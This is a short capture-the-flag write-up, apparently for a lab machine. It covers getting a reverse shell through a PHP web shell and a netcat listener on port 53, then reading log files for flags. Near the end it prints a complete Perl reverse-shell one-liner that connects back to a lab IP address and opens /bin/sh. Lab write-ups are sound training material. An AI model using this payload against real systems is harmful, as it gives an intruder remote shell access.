First Contact

Get a reverseshell

We have identified a potential attack surface that we can use to execute php and shell commands on. We are able to execute a reverse shell on the web shell in order to get a shell back on the machine.

Uploading a php Reverseshell

For the PHP reverse shell, weโ€™ll be using Pentest Monkeyโ€™s reverse shell found here or in kali under /usr/share/webshells/php/php-reverse-shell.php

  1. Modify the reverse shell to your tun0 IP address and port.

  2. Paste php code into webshell. Note: First line <?php and last line ?> needs to be removed

  3. start netcat listener on port 53

  4. Execute reverseshell

Problem with netcat listener on port 53

Kill systemd-resolv process and start netcat listener again

Execute the reverseshell:

To answer the questions and find the flag I need to focus myself on logs

Searching for logs: cd /var/log

content of /var/log
content of login.log and flag.txt

Getting the root flag

content of rot.txt

Additional way to get a reverseshell

reverseshell cheatsheet
perl -e 'use Socket;$i="10.50.133.33";$p=8001;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Execute perl reverse shell

Questions

Last updated

Was this helpful?